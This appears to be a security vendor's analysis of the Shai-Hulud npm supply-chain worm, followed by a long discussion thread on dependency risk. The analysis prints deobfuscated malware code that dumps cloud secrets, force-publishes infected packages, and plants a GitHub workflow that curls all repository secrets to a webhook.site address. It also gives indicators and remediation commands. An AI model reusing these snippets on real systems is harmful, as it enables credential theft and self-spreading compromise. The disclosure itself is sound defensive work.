The popular @ctrl/tinycolor package with over 2 million weekly downloads has been compromised alongside 40+ other NPM packages in a sophisticated supply chain attack. The malware self-propagates…
The NPM ecosystem is facing another critical supply chain attack. The popular @ctrl/tinycolor package, which receives over 2 million weekly downloads, has been compromised along with more than 40 other packages across multiple maintainers. This attack demonstrates a concerning evolution in supply chain threats - the malware includes a self-propagating mechanism that automatically infects downstream packages, creating a cascading compromise across the ecosystem. The compromised versions have been removed from npm.
The incident was discovered by @franky47, who promptly notified the community through a GitHub issue.
In this post, we'll dive deep into the payload's mechanics, including deobfuscated code snippets, API call traces, and diagrams to illustrate the attack chain. Our analysis reveals a Webpack-bundled script (bundle.js) that leverages Node.js modules for reconnaissance, harvesting, and propagation; targeting Linux/macOS devs with access to NPM/GitHub/cloud creds.
The attack unfolds through a sophisticated multi-stage chain that leverages Node.js's process.env for opportunistic credential access and employs Webpack-bundled modules for modularity. At the core of this attack is a ~3.6MB minified bundle.js file, which executes asynchronously during npm install. This execution is likely triggered via a hijacked postinstall script embedded in the compromised package.json.
Self-Propagation Engine
The malware includes a self-propagation mechanism through the NpmModule.updatePackage function. This function queries the NPM registry API to fetch up to 20 packages owned by the maintainer, then force-publishes patches to these packages. This creates a cascading compromise effect, recursively injecting the malicious bundle into dependent ecosystems across the NPM registry.
Credential Harvesting
The malware repurposes open-source tools like TruffleHog to scan the filesystem for high-entropy secrets. It searches for patterns such as AWS keys using regular expressions like AKIA[0-9A-Z]{16}. Additionally, the malware dumps the entire process.env, capturing transient tokens such as GITHUB_TOKEN and AWS_ACCESS_KEY_ID.
For cloud-specific operations, the malware enumerates AWS Secrets Manager using SDK pagination and accesses Google Cloud Platform secrets via the @google-cloud/secret-manager API. The malware specifically targets the following credentials:
Persistence Mechanism
The malware establishes persistence by injecting a GitHub Actions workflow file (.github/workflows/shai-hulud-workflow.yml) via a base64-encoded bash script. This workflow triggers on push events and exfiltrates repository secrets using the expression ${{ toJSON(secrets) }} to a command and control endpoint. The malware creates branches by force-merging from the default branch (refs/heads/shai-hulud) using GitHub's /git/refs endpoint.
Data Exfiltration
The malware aggregates harvested credentials into a JSON payload, which is pretty-printed for readability. It then uploads this data to a new public repository named Shai-Hulud
via the GitHub /user/repos API.
The entire attack design assumes Linux or macOS execution environments, checking for os.platform() === 'linux' || 'darwin'. It deliberately skips Windows systems. For a visual breakdown, see the attack flow diagram below:
The compromise begins with a sophisticated minified JavaScript bundle injected into affected packages like @ctrl/tinycolor. This is not rudimentary malware but rather a sophisticated modular engine that uses Webpack chunks to organize OS utilities, cloud SDKs, and API wrappers.
The payload imports six core modules, each serving a specific function in the attack chain.
This module calls getSystemInfo() to build a comprehensive system profile containing platform, architecture, platformRaw, and archRaw information. It dumps the entire process.env, capturing sensitive environment variables including AWS_ACCESS_KEY_ID, GITHUB_TOKEN, and other credentials that may be present in the environment.
The AWS harvesting module validates credentials using the STS AssumeRoleWithWebIdentityCommand. It then enumerates secrets using the @aws-sdk/client-secrets-manager library.
// Deobfuscated AWS harvest snippet
async getAllSecretValues() {
const secrets = [];
let nextToken;
do {
const resp = await client.send(new ListSecretsCommand({ NextToken: nextToken }));
for (const secret of resp.SecretList || []) {
const value = await client.send(new GetSecretValueCommand({ SecretId: secret.ARN }));
secrets.push({ ARN: secret.ARN, SecretString: value.SecretString, SecretBinary: atob(value.SecretBinary) }); // Base64 decode binaries
} nextToken = resp.NextToken;
} while (nextToken);
return secrets;
}
The module handles errors such as DecryptionFailure or ResourceNotFoundException silently through decorateServiceException wrappers. It targets all AWS regions via endpoint resolution.
The GCP module uses @google-cloud/secret-manager to list secrets matching the pattern projects//secrets/. It implements pagination using nextPageToken and returns objects containing the secret name and decoded payload. The module fails silently on PERMISSION_DENIED errors without alerting the user.
This module spawns TruffleHog via child_process.exec('trufflehog filesystem / --json') to scan the entire filesystem. It parses the output for high-entropy matches, such as AWS keys found in ~/.aws/credentials.
The NPM propagation module parses NPM_TOKEN from either ~/.npmrc or environment variables. After validating the token via the /whoami endpoint, it queries /v1/search?text=maintainer:${username}&size=20 to retrieve packages owned by the maintainer.
// Deobfuscated NPM update snippet
async updatePackage(pkg) {
// Patch package.json (add self as dep?) and publish
await exec(`npm version patch --force && npm publish --access public --token ${token}`);
}
This creates a cascading effect where an infected package leads to compromised maintainer credentials, which in turn infects all other packages maintained by that user.
The GitHub backdoor module authenticates via the /user endpoint, requiring repo and workflow scopes. After listing organizations, it injects malicious code via a bash script (Module 941).
Here is the line-by-line bash script deconstruction:
# Deobfuscated Code snippet
#!/bin/bash
GITHUB_TOKEN="$1"
BRANCH_NAME="shai-hulud"
FILE_NAME=".github/workflows/shai-hulud-workflow.yml"
FILE_CONTENT=$(cat <<'EOF'
on: push # Trigger on any push
jobs: process
runs-on: ubuntu-latest steps:
- run: curl -d "$CONTENTS" https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7; # C2 exfil
echo "$CONTENTS" | base64 -w 0 | base64 -w 0 # Double-base64 for evasion
env: CONTENTS: ${{ toJSON(secrets) }} # Dumps all repo secrets (GITHUB_TOKEN, AWS keys, etc.)
EOF
) github_api() { curl -s -X "$1" -H "Authorization: token $GITHUB_TOKEN" ... "$API_BASE$2" }
REPOS_RESPONSE=$(github_api GET "/user/repos?affiliation=owner,collaborator,organization_member&since=2025-01-01T00:00:00Z&per_page=100")
while IFS= read -r repo; do
# Get default branch SHA
REF_RESPONSE=$(github_api GET "/repos/$REPO_FULL_NAME/git/ref/heads/$DEFAULT_BRANCH")
BASE_SHA=$(jq -r '.object.sha' <<< "$REF_RESPONSE")
BRANCH_DATA=$(jq -n '{ref: "refs/heads/shai-hulud", sha: "$BASE_SHA"}')
github_api POST "/repos/$REPO_FULL_NAME/git/refs" "$BRANCH_DATA" # Handles "already exists" gracefully
FILE_DATA=$(jq -n '{message: "Add workflow", content: "$(base64 <<< "$FILE_CONTENT")", branch: "shai-hulud"}')
github_api PUT "/repos/$REPO_FULL_NAME/contents/$FILE_NAME" "$FILE_DATA" # Overwrites if exists
done
This mechanism ensures persistence, as secrets are exfiltrated to the command and control server on the next push event.
The malware builds a comprehensive JSON payload containing system information, environment variables, and data from all modules. It then creates a public repository via the GitHub /repos POST endpoint using the function makeRepo('Shai-Hulud')
. The repository is public by default to ensure easy access for the command and control infrastructure.
The attack employs several evasion techniques including silent error handling (swallowed via catch {} blocks), no logging output, and disguising TruffleHog execution as a legitimate "security scan."
The following indicators can help identify systems affected by this attack:
Use these GitHub search queries to identify potentially compromised repositories across your organization:
Replace ACME
with your GitHub organization name and use the following GitHub search query to discover all instance of shai-hulud-workflow.yml
in your GitHub environment.
https://github.com/search?q=org%3AACME+path%3A**%2Fshai-hulud-workflow.yml&type=code
To find malicious branches, you can use the following Bash script:
# List all repos and check for shai-hulud branch
gh repo list YOUR_ORG_NAME --limit 1000 --json nameWithOwner --jq '.[].nameWithOwner' | while read repo; do
gh api "repos/$repo/branches" --jq '.[] | select(.name == "shai-hulud") | "'$repo' has branch: " + .name'
done
46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09
https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7
.github/workflows/shai-hulud-workflow.yml
NpmModule.updatePackage
functionsecretsmanager.*.amazonaws.com
endpoints, particularly BatchGetSecretValueCommand
secretmanager.googleapis.com
registry.npmjs.org/v1/search
api.github.com/repos
filesystem /
--force
flagThe following packages have been confirmed as compromised:
Package Name | Version(s) |
---|---|
@ctrl/tinycolor | 4.1.1, 4.1.2 |
angulartics2 | 14.1.2 |
@ctrl/deluge | 7.2.2 |
@ctrl/golang-template | 1.4.3 |
@ctrl/magnet-link | 4.0.4 |
@ctrl/ngx-codemirror | 7.0.2 |
@ctrl/ngx-csv | 6.0.2 |
@ctrl/ngx-emoji-mart | 9.2.2 |
@ctrl/ngx-rightclick | 4.0.2 |
@ctrl/qbittorrent | 9.7.2 |
@ctrl/react-adsense | 2.0.2 |
@ctrl/shared-torrent | 6.3.2 |
@ctrl/torrent-file | 4.1.2 |
@ctrl/transmission | 7.3.1 |
@ctrl/ts-base32 | 4.0.2 |
encounter-playground | 0.0.5 |
json-rules-engine-simplified | 0.2.4, 0.2.1 |
koa2-swagger-ui | 5.11.2, 5.11.1 |
@nativescript-community/gesturehandler | 2.0.35 |
@nativescript-community/sentry | 4.6.43 |
@nativescript-community/text | 1.6.13 |
@nativescript-community/ui-collectionview | 6.0.6 |
@nativescript-community/ui-drawer | 0.1.30 |
@nativescript-community/ui-image | 4.5.6 |
@nativescript-community/ui-material-bottomsheet | 7.2.72 |
@nativescript-community/ui-material-core | 7.2.76 |
@nativescript-community/ui-material-core-tabs | 7.2.76 |
ngx-color | 10.0.2 |
ngx-toastr | 19.0.2 |
ngx-trend | 8.0.1 |
react-complaint-image | 0.0.35 |
react-jsonschema-form-conditionals | 0.3.21 |
react-jsonschema-form-extras | 1.0.4 |
rxnt-authentication | 0.0.6 |
rxnt-healthchecks-nestjs | 1.0.5 |
rxnt-kue | 1.0.7 |
swc-plugin-component-annotate | 1.9.2 |
ts-gaussian | 3.0.6 |
If you use any of the affected packages, take these actions immediately:
# Check for affected packages in your project
npm ls @ctrl/tinycolor # Remove compromised packages
npm uninstall @ctrl/tinycolor # Search for the known malicious bundle.js by hash
find . -type f -name "*.js" -exec sha256sum {} \; | grep "46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09"
# Check for and remove the backdoor workflow
rm -f .github/workflows/shai-hulud-workflow.yml # Look for suspicious 'shai-hulud' branches in all repositories
git ls-remote --heads origin | grep shai-hulud # Delete any malicious branches found
git push origin --delete shai-hulud
The malware harvests credentials from multiple sources. Rotate ALL of the following:
Since the malware specifically targets AWS Secrets Manager and GCP Secret Manager, you need to audit your cloud infrastructure for unauthorized access. The malware uses API calls to enumerate and exfiltrate secrets, so reviewing audit logs is critical to understanding the scope of compromise.
Start by examining your CloudTrail logs for any suspicious secret access patterns. Look specifically for BatchGetSecretValue, ListSecrets, and GetSecretValue API calls that occurred during the time window when the compromised package may have been installed. Also generate and review IAM credential reports to identify any unusual authentication patterns or newly created access keys.
# Check CloudTrail for suspicious secret access
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=BatchGetSecretValue
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=ListSecrets
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=GetSecretValue # Review IAM credential reports for unusual activity
aws iam get-credential-report --query 'Content'
For Google Cloud Platform, review your audit logs for any access to the Secret Manager service. The malware uses the @google-cloud/secret-manager library to enumerate secrets, so look for unusual patterns of secret access. Additionally, check for any unauthorized service account key creation, as these could be used for persistent access.
# Review secret manager access logs
gcloud logging read "resource.type=secretmanager.googleapis.com" --limit=50 --format=json
# Check for unauthorized service account key creation
gcloud logging read "protoPayload.methodName=google.iam.admin.v1.CreateServiceAccountKey"
webhook.site
domains immediatelyhttps://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7
The following steps are applicable only for StepSecurity enterprise customers. If you are not an existing enterprise customer, you can start our 14 day free trial by installing the StepSecurity GitHub App to complete the following recovery step.
The NPM Cooldown check automatically fails a pull request if it introduces an npm package version that was released within the organization’s configured cooldown period (default: 2 days). Once the cooldown period has passed, the check will clear automatically with no action required. The rationale is simple - most supply chain attacks are detected within the first 24 hours of a malicious package release, and the projects that get compromised are often the ones that rushed to adopt the version immediately. By introducing a short waiting period before allowing new dependencies, teams can reduce their exposure to fresh attacks while still keeping their dependencies up to date.
Here is an example showing how this check protected a project from using the compromised versions of packages involved in this incident:
As a user of npm-hosted packages in my own projects, I'm not really sure what to do to protect myself. It's not feasible for me to audit every single one of my dependencies, and every one of my dependencies' dependencies, and so on. Even if I had the time to do that, I'm not a typescript/javascript expert, and I'm certain there are a lot of obfuscated things that an attacker could do that I wouldn't realize was embedded malware.
One thing I was thinking of was sort of a "delayed" mode to updating my own dependencies. The idea is that when I want to update my dependencies, instead of updating to the absolute latest version available of everything, it updates to versions that were released no more than some configurable amount of time ago. As a maintainer, I could decide that a package that's been out in the wild for at least 6 weeks is less likely to have unnoticed malware in it than one that was released just yesterday.
Obviously this is not a perfect fix, as there's no guarantee that the delay time I specify is enough for any particular package. And I'd want the tool to present me with options sometimes: e.g. if my current version of a dep has a vulnerability, and the fix for it came out a few days ago, I might choose to update to it (better eliminate the known vulnerability than refuse to update for fear of an unknown one) rather than wait until it's older than my threshold.
> It's not feasible for me to audit every single one of my dependencies, and every one of my dependencies' dependencies
I think this is a good argument for reducing your dependency count as much as possible, and keeping them to well-known and trustworthy (security-wise) creators.
"Not-invented-here" syndrome is counterproductive if you can trust all authors, but in an uncontrolled or unaudited ecosystem it's actually pretty sensible.
Have we all forgotten the left-pad incident?
This is an eco system that has taken code reuse to the (unreasonable) extreme.
When JS was becoming popular, I’m pretty sure every dev cocked an eyebrow at the dependency system and wondered how it’d be attacked.
> This is an eco system that has taken code reuse to the (unreasonable) extreme.
Not even that actually. Actually the wheel is reinvented over and over again in this exact ecosystem. Many packages are low quality, and not even suitable to be reused much.
The perfect storm of on the one side junior developers who are afraid of writing even trivial code and are glad if there's a package implementing functionality that can be done in a one-liner, and on the other side (often junior) developers who want to prove themselves and think the best way to do that is to publish a successful npm package
The blessing and curse of frontend development is that there basically isn't a barrier to entry given that you can make some basic CSS/JS/HTML and have your browser render it immediately.
There's also the flavor of frontend developer that came from the backend and sneers at actually having to learn frontend because "it's not real development"
Ha, that's a funny attitude. And here I was thinking, that mostly doing backend work, I rather make the best out of the situation, if I have to do frontend dev, and try to do "real development" by writing trivial things myself, instead of worsening the situation by gluing together mountains of bloat.
> There's also the flavor of frontend developer that came from the backend and sneers at actually having to learn frontend because "it's not real development"
What kind of code does this developer write?
As little code as possible to get the job done without enormous dependencies. Avoiding js and using css and html as much as possible.
The designer, the customer, and US/EU accessibility laws heavily disagree.
The designer already disagrees with accessibility laws. Contrast is near zero.
The designer might only disagree, if they know a lot about frontend technology, and are not merely clicking together a figma castle.
But the middle management might actually praise the developer, because they "get the job done" with the minimal effort (so "efficient"!).
How is javascript required for accessibility? I wasn’t aware of that.
It is not. In fact, it is all the modern design sensibilities and front-end frameworks that make it nearly impossible to make accessible things.
We once had the rule HTML should be purely semantic and all styling should be in CSS. It was brilliant, even though not everything looked as fancy as today.
JS is in fact required for AA level compliance in some cases, usually to retain/move focus appropriately, or to provide expected keyboard controls.
https://www.w3.org/WAI/WCAG22/Techniques/#client-side-script
Also, when was that semantic HTML rule? You make it sound like ancient history, but semantic HTML has only been a thing since HTML5 (2008).
You only need to use scripts to move focus and provide keyboard controls if you have done something to mess with the focus and break the standard browser keyboard controls.
If you're using HTML/CSS sensibly then it's accessible from the get-go by dint of the browser being accessible.
> Also, when was that semantic HTML rule? You make it sound like ancient history, but semantic HTML has only been a thing since HTML5 (2008).
HTML5 added a million new tags, but HTML4 had plenty of semantic tags that people regularly ignored and replaced with <div>, for example <p>, <em>, <blockquote>...
In some cases, sure.
I'm not saying the ideal frontend dev writes no JS. I'm saying they write as little as possible. Some times you need JS, nothing wrong with that. The vast majority of the time you don't. And if you do I'd say it's a self-imposed requirement (or a direct/indirect result of a self imposed requirement) most of the time.
Some of those are fixes for misbehaving javascript like disabling nonessential alerts, stopping blinking, reducing animation; some are antipatterns like opening new windows, changing link text, colors, scrolling.
The web standards project was founded in 1998.
As the customer, I think that's the perfect frontend dev. Fuck the JS monstrosities that people build, they are so much harder to use than plain HTML.
A11y is mostly handled by just using semantic html.
The designer, in my experience, is totally fine with just using a normal select element, they don't demand that I reinvent the drop-down with divs just to put rounded corners on the options.
Nobody cares about that stuff. These are minor details, we can change it later if someone really wants it. As long as we're not just sitting on our hands for lack of work I'm not putting effort into reinventing things the browser has already solved.
I hope in the future I can work with that kind of designer. Maybe it is just my limited experience, but in that limited experience, web designers care way too much about details and design features/ideas/concepts, that are not part of HTML or CSS and then frontend developers would have to push back and tell the web designer, that form follows function and that the medium they design for is important. Basic design principles actually, that the designers should know themselves, just like they should know the medium they are targeting (semandic HTML, CSS, capabilities of them both, a tiny bit about JS too), to keep things reasonable. But most frontend devs are happy to build fancy things with JS instead of pushing back when it matters. And not so many frontend devs want to get into CSS deeply and do everything they can to avoid JS. So needless things do get implemented all the time.
The word ”mostly” is the crux of the issue.
The designer wants huge amounts of screen space wasted on unnnecessary padding, massive Fisher-Price rounded corners, and fancy fading and sliding animations that get in the way and slow things down. (Moreover, the designer just happens to want to completely re-design everything a few months later.)
The customer “ooh”s and “aah”s at said fancy animations running on the salesman’s top of the line macbook pro and is lured in, only realising too late that they’ve been bitten in the ass by the enormous amount of bloat that makes it run like a potato on any computer that costs less than four thousand dollars.
And US/EU laws are written by clueless bureaucrats whose most recent experience with technology is not even an electric typewriter.
What’s your point?
I think their point is that you might not have much of a choice, taking laws and modern aesthetic and economic concerns into consideration.
We "in the know" might agree, but we're not going to get it sold.
I think blind people should be able to use websites.
Wow, those are some jaded and cynical views.
In my experience, generally speaking there is a kind of this developer that tries to write a language they’re familiar with, but in Javascript. As the pithy saying goes, it takes a lot of skill to write Java in every language.
Usually they write only prompts and then accept whatever is generated, ignoring all typing and linting issues
Prompts? React and Angular came out over 10 years ago. The left pad incident happened in 2016.
Let me assure you, devs were skeptical about all this well before AI.
People pushing random throwaway packages is not the issue.
A lot of the culture is built by certain people who make a living out of package maximalism.
More packages == more eyballs == more donations.
They have an agenda that small packages are good and made PRs into popular packages to inject their junk into the supply chain.
Not on HN, the land of "you should use a SaaS or PaaS for that (because I might eventually work there and make money)" or "I don't want to maintain that code because it's not strictly related to my CRUD app business! how you dare!"
1.2 million weekly downloads to this day, when we've had builtin padStart since ES2017.
Yes, I remember thinking at the time "how are people not ashamed to install this?"
I found it funny back when people were abandoning Java for JavaScript thinking that was better somehow...(especially in terms of security)
NPM is good for building your own stack but it's a bad idea (usually) to download the Internet. No dep system is 100% safe (including AI, generating new security vulns yay).
I'd like to think that we'll all stop grabbing code we don't understand and thrusting it into places we don't belong, or at least, do it more slowly, however, I also don't have much faith in the average (especially frontend web) dev. They are often the same idiots doing XYZ in the street.
I predict more hilarious (scary even) kerfuffles, probably even major militaries losing control of things ala Terminator style.
It’s not clear to me what this has to do with Java vs JavaScript (unless you’re referring to the lack of a JS standard library which I think will pretty much minimize this issue).
In fact, when we did have Java in the browser it was loaded with security issues primarily because of the much greater complexity of the Java language.
Java has maven, and is far from immune from similar types of attacks. However, it doesn't have the technological monstrosity named NPM. In fact that aforementioned complexity is/was an asset in raising the bar, however slightly, in producing java packages. Crucially, that ecosystem is nowhere near as absurdly complex (note, I'm ignoring the I'll fated cousin that is Gradle, and is also notorious for being a steaming pile of barely-working inscrutable dependencies)
Anyways, I think you are missing the forest for the trees if you think this is a Java vs JavaScript comparison, don't worry it's also possible to produce junk enterprise code too...
Just amusing watching people be irrationally scared of one language/ecosystem vs another without stopping to think why or where the problems are coming from.
It's not the language it's the library that's not designed to isolate untrusted code from the start. Much harder to exit the sandbox if your only I/O mechanism is the DOM, alert() and prompt().
And the whole rest of the Internet...
The issue here is not Java or it's complexity. The point is also not Java, it's incidental that it was popular at the time. It's people acting irrationally about things and jumping ship for an even-worse system.
Like, yes, if that really were the whole attack surface of JS, sure nobody would care. They also wouldn't use it...and nothing we cared about would use it either...
The security issues with Java applets usually led to local unsandboxed code execution. It's a lot harder to do that with JS because just running Java and confusing the security manager gets you full Java library access, vs JS with no built in I/O.
In that era JavaScript was also loaded with security issues. That's why browsers had to invest so much in kernel sandboxing. Securing JavaScript VMs written by hand in C++ is a dead end, although ironically given this post, it's easier when they're written in Java [1]
But the reason Java is more secure than JavaScript in the context of supply chain attacks is fourfold:
1. Maven packages don't have install scripts. "Installing" a package from a Maven repository just means downloading it to a local cache, and that's it.
2. Java code is loaded lazily on demand, class at a time. Even adding classes to a JAR doesn't guarantee they'll run.
3. Java uses fewer, larger, more curated libraries in which upgrades are a more manual affair involving reading the release notes and the like. This does have its downsides: apps can ship with old libraries that have unfixed bugs. Corporate users tend to have scanners looking for such problems. But it also has an upside, in that pushing bad code doesn't immediately affect anything and there's plenty of time for the author to notice.
4. Corporate Java users often run internal mirrors of Maven rather than having every developer fetch from upstream.
The gap isn't huge: Java frameworks sometimes come with build system plugins that could inject malware as they compile the code, and of course if you can modify a JAR you can always inject code into a class that's very likely to be used on any reasonable codepath.
But for all the ragging people like to do on Java security, it was ahead of its time. A reasonable fix for these kind of supply chain attacks looks a lot like the SecurityManager! The SecurityManager didn't get enough adoption to justify its maintenance costs and was removed, partly because of those factors above that mean supply chain attacks haven't had a significant impact on the JVM ecosystem yet, and partly due to its complexity.
It's not clear yet what securing the supply chain in the Java world will look like. In-process sandboxing might come back or it might be better to adopt a Chrome-style microservice architecture; GraalVM has got a coarser-grained form of sandboxing that supports both in-process and out-of-process isolation already. I wrote about the tradeoffs involved in different approaches here:
https://blog.plan99.net/why-not-capability-languages-a8e6cbd...
[1] https://medium.com/graalvm/writing-truly-memory-safe-jit-com...
If it's not feasible to audit every single dependency, it's probably even less feasible to rewrite every single dependency from scratch. Avoiding that duplicated work is precisely why we import dependencies in the first place.
Most dependencies do much more than we need from them. Often it means we only need one or a few functions from them. This means one doesn't need to rewrite whole dependencies usually. Don't use dependencies for things you can trivially write yourself, and use them for cases where it would be too much work to write yourself.
A brief but important point is that this primarily holds true in the context of rewriting/vendoring utilities yourself, not when discussing importing small vs. large dependencies.
Just because dependencies do a lot more than you need, doesn't mean you should automatically reach for the smallest dependency that fits your needs.
If you need 5 of the dozens of Lodash functions, for instance, it might be best to just install Lodash and let your build step shake out any unused code, rather than importing 5 new dependencies, each with far fewer eyes and release-management best practices than the Lodash maintainers have.
The argument wasn’t to import five dependencies, one for each of the functions, but to write the five functions yourself. Heck, you don’t even need to literally write them, check the Lodash source and copy them to your code.
This might be fine for some utility functions which you can tell at a glance have no errors, but for anything complex, if you copy you don't get any of the bug/security fixes that upstream will provide automatically. Oh, now you need a shim of this call to work on the latest Chrome because they killed an api- you're on your own or you have to read all of the release notes for a dependency you don't even have! But taking a dependency on some other library is, as you note, always fraught. Especially because of transitive dependencies, you end up having quite a target surface area for every dep you take.
Whether to take a dependency is a tricky thing that really comes down to engineering judgement- the thing that you (the developer) are paid to make the calls on.
The massive amount of transitive dependencies is exactly the problem with regard to auditing them. There are successful businesses built solely around auditing project dependencies and alerting teams of security issues, and they make money at all because of the labor required to maintain this machine.
It’s not even a judgement call at this point. It’s more aligned with buckling your seatbelt, pointing your car off the road, closing your eyes, flooring it and hoping for a happy ending.
And then when node is updated and natively supports set intersections you would go back to your copied code and fix it?
If it works, why do so? Unless there's a clear performance boost, and if so you already know the code and can quickly locate your interpreted version.
Or At the time of adding you can add a NOTE or FIXME comment stating where you copied it from. A quick grep for such keyword can give you a nice overview of nice to have stuff. You can also add a ticket with all the details if you're using a project management tool and resuscitate it when that hypothetical moment happens.
If you won't, do you expect the maintainer of some micro package to do that?
You have obviously never checked the Lodash source.
The point here isn’t a specific library. It’s not even one specific language or runtime. No one is talking about literally five functions. Let’s not be pedantic and lose sight of the major point.
I get that, but if you’ve ever tried to extract a single utility function from lodash, you know that it may not be as simple as copy-pasting a single function.
If you are going to be that specific, then it would be good to post an example. If I remember correctly, lodash has some functions, that would be table stakes in functional languages, or easily built in functional languages. If such a function is difficult to extract, then it might be a good candidate to write in JS itself, which does have some of the typical tools, like map, reduce, and things like compose are easy to write oneself and part of every FP beginner tutorial. If such a function is difficult to extract, then perhaps lodash's design is not all that great. Maybe one could also copy them from elsewhere, where the code is more modular.
But again, if the discussion is going to be that specific, then you would need to provide actual examples, so that we could judge, whether we would implement that ourselves or it would be difficult to do so. Note, that often it is also not required for ones use-case, to have a 100% matching behavior either. The goal is not to duplicate lodash. The purpose of the extracted or reimplemented function would still be ones own project, where the job of that function might be much more limited.
Let’s start with something simple, like difference().
https://github.com/lodash/lodash/blob/main/dist/lodash.js#L7...
So you also need to copy isArrayLikeObject, baseDifference and baseFlatten.
For baseDifference, you also need to copy arrayMap and baseUnary.
For baseFlatten, you also need to copy arrayPush.
For isArrayLikeObject, you also need to copy isArrayLike and isObjectLike.
For isArrayLike, you also need to copy isLength and isFunction.
For isFunction, you also need to copy isObject and baseGetTag.
For baseGetTag, you also need to copy getRawTag and objectToString.
I don’t have time to dig any deeper, just use tree-shaking ffs.
OK in this case it looks like it is doing a lot of at runtime checking of arguments to treat them differently, based on what type of argument they are. If we restrict use to only work with arrays, or whatever we have in our project, where we need `difference`, then it should become much simpler and an easy rewrite. An alternative could be to have another argument, that is the function that gives us the `next` thing. Then the logic for that is to be specified by the caller.
Tree shaking however, will not help you, if you have to first install a library using NPM. It will only help you reduce overhead in the code served to a browser. Malicious code can run much earlier, and would be avoided, if you rewrite or extract relevant code from a library, avoiding to install the library using NPM. Or is there some pre-installation tree shaking, that I am unaware of? That would actually be interesting.
I guess that pre-installation tree shaking in this case is installing ’lodash.difference’ instead of ’lodash’. :)
Yes, fewer, larger, trustworthy dependencies with tree shaking is the way to go if you ask me.
Yeah, but perhaps we could have different flavors. If you like functional style you could have a very functional standard library that doesn't mutate anything, or if you like object oriented stuff you could have classes of object with methods that mutate themselves. And the Typescript folks could have a strongly typed library.
I wanted to make a joke about
npm install stdlib
…but double checked before and @stdlib/stdlib has 58 dependencies, so the joke preempted me.I think the level of protection you get from that depends on how the unused code detection interacts with whatever tricks someone is using for malicious code.
I agree with this but the problem is that a lot of the extra stuff dependencies do is indeed to protect from security issues.
If you’re gonna reimplement only thr code you need from a dependency, it’s hard to know of the stuff you’re leaving out how much is just extra stuff you don’t need and how much might be security fixes that may not be apparent to you but the dependency by virtue of being worked upon and used by many people has fixed.
I'm using LLMs to write stuff that would normally be in dependencies, mostly because I don't want to learn how to use the dependency, and writing a new one from scratch is really easy with LLMs.
Age of bespoke software is here. Did you have any hard to spot non-obvious bugs in these code units?
It isn't feasible to audit every line of every dependency, just as it's not possible to audit the full behavior of every employee that works at your company.
In both cases, the solution is similar: try to restrict access to vital systems only to those you trust,so that you have less need to audit their every move.
Your system administrators can access the server room, but the on-site barista can't. Your HTTP server is trusted enough to run in prod, but a color-formatting library isn't.
> It isn't feasible to audit every line of every dependency, just as it's not possible to audit the full behavior of every employee that works at your company.
Your employees are carefully vetted before hiring. You've got their names, addresses, and social security numbers. There's someone you're able to hold accountable if they steal from you or start breaking everything in the office.
This seems more like having several random contractors who you've never met coming into your business in the middle of night. Contractors that were hired by multiple anonymous agencies you just found online somewhere with company names like gkz00d or 420_C0der69 who you've also never even spoken to and who have made it clear that they can't be held accountable for anything bad that happens. Agencies that routinely swap workers into or out of various roles at your company without asking or telling you, so you don't have any idea who the person working in the office is, what they're doing, or even if they're supposed to be there.
"To make thing easier for us we want your stuff to require the use of a bunch of code (much of which does things you don't even need) that we haven't bothered looking at because that'd be too much work for us. Oh, and third parties we have no relationship with control a whole bunch of that code which means it can be changed at any moment introducing bugs and security issues we might not hear about for months/years" seems like it should be a hard sell to a boss or a client, but it's sadly the norm.
Assuming that something is going to go wrong and trying to limit the inevitable damage is smart, but limiting the amount of untrustworthy code maintained by the whims of random strangers is even better. Especially when the reasons for including something that carries so much risk is to add something trivial or something you could have just written yourself in the first place.
> This seems more like having several random contractors who you've never met coming into your business in the middle of night. [...] Agencies that routinely swap workers into or out of various roles at your company without asking or telling you, so you don't have any idea who the person working in the office is, what they're doing, or even if they're supposed to be there.
Sounds very similar to how global SIs staff enterprise IT contracts.
That hit much too close to reality. It's exactly like that. Even the names were spot on!
This is true to the extent that you actually _use_ all of the features of a dependency.
You only need to rewrite what you use, which for many (probably most) libraries will be 1% or less of it
Indeed. About 26% of the disk space for a freshly-installed copy of pip 25.2 for Python 3.13 comes from https://pypi.org/project/rich/ (and its otherwise-unneeded dependency https://pypi.org/project/Pygments/), "a Python library for rich text and beautiful formatting in the terminal", hardly any of the features of which are relevant to pip. This is in spite of an apparent manual tree-shaking effort (mostly on Pygments) — a separate installed copy of rich+Pygments is larger than pip. But even with that attempt, for example, there are hundreds of kilobytes taken up for a single giant mapping of "friendly" string names to literally thousands of emoji.
Another 20% or more is https://pypi.org/project/requests/ and its dependencies — this is an extremely popular project despite that the standard library already provides the ability to make HTTPS connections (people just hate the API that much). One of requests' dependencies is certifi, which is basically just a .pem file in Python package form. The vendored requests has not seen any tree-shaking as far as I can tell.
This sort of thing is a big part of why I'll be able to make PAPER much smaller.
it's probably even less feasible to rewrite every single dependency from scratch.
When you code in a high-security environment, where bad code can cost the company millions of dollars in fines, somehow you find a way.
The sibling commenter is correct. You write what you can. You only import from trusted, vetted sources.
> If it's not feasible to audit every single dependency, it's probably even less feasible to rewrite every single dependency from scratch.
There is no need to rewrite dependencies. Sometimes it just so happens that a project can live without outputting fancy colorful text to stdout, or doesn't need to spread transitive dependencies on debug utilities. Perhaps these concerns should be a part of the standard library, perhaps these concerns are useless.
And don't get me started on bullshit polyfill packages. That's an attack vector waiting to be exploited.
Its much more feasible these days. These days for my personal projects I just have CC create only a plain html file with raw JS and script links.
Not sure I completely agree as you often use only a small part of a library
One interesting side effect of AI is that it makes it sometimes easy to just recreate the behavior, perhaps without even realizing it..
is it that infeasible with LLMs?
a lor of these dependencies are higher order function definitions, which never change, and could be copy/pasted around just fine. they're never gonna change
"rewrite every single dependency from scratch"
No need to. But also no need to pull in a dependency that could be just a few lines of own (LLM generated) code.
>>a few lines of own (LLM generated) code.
... and now you've switched the attack vector to a hostile LLM.
Sure but that's a one time vector. If the attacker didn't infiltrate the LLM before it generated the code, then the code is not going to suddenly go hostile like an npm package can.
Though you will see the code at least, when you are copy pasting it and if it is really only a few lines, you may be able to review it. Should review it of course.
